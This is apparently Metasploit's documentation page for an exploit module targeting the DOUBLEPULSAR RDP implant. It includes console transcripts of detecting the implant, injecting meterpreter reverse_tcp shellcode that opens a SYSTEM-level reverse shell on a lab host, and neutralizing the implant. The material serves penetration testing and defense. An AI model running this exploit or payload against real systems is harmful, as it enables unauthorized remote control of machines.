
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md

Introduction

This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for RDP.

While this module primarily performs code execution against the implant, the Neutralize implant target allows you to disable the implant.

Targets

| Id | Name                  |
| -- | --------------------- |
| 0  | Execute payload (x64) |
| 1  | Neutralize implant    |

Options

DefangedMode

Set this to false to disable defanged mode and enable the module's exploit and neutralization functionality. Set this only if you're SURE you want to proceed.

ProcessName

Set this to the userland process you want to inject the payload into. Defaults to spoolsv.exe.

Usage

Pinging the implant:

```
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > check
[*] 192.168.56.115:3389 - Verifying RDP protocol...
[*] 192.168.56.115:3389 - Attempting to connect using TLS security
[*] 192.168.56.115:3389 - Swapping plain socket to SSL
[*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
[!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64
[+] 192.168.56.115:3389 - The target is vulnerable.
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) >
```

Executing a payload:

```
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set target Execute\ payload
target => Execute payload
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.115:3389 - Verifying RDP protocol...
[*] 192.168.56.115:3389 - Attempting to connect using TLS security
[*] 192.168.56.115:3389 - Swapping plain socket to SSL
[*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
[!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64
[*] 192.168.56.115:3389 - Generating kernel shellcode with windows/x64/meterpreter/reverse_tcp
[*] 192.168.56.115:3389 - Total shellcode length: 4096 bytes
[*] 192.168.56.115:3389 - Sending shellcode to DOUBLEPULSAR
[*] Sending stage (206403 bytes) to 192.168.56.115
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.115:49158) at 2019-11-25 18:10:21 -0600
[+] 192.168.56.115:3389 - Payload execution successful

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-S7TDBIENPVM
OS              : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >
```

Neutralizing the implant:

```
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set target Neutralize\ implant
target => Neutralize implant
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.115:3389 - Verifying RDP protocol...
[*] 192.168.56.115:3389 - Attempting to connect using TLS security
[*] 192.168.56.115:3389 - Swapping plain socket to SSL
[*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
[!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64
[*] 192.168.56.115:3389 - Neutralizing DOUBLEPULSAR
[+] 192.168.56.115:3389 - Implant neutralization successful
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) >
```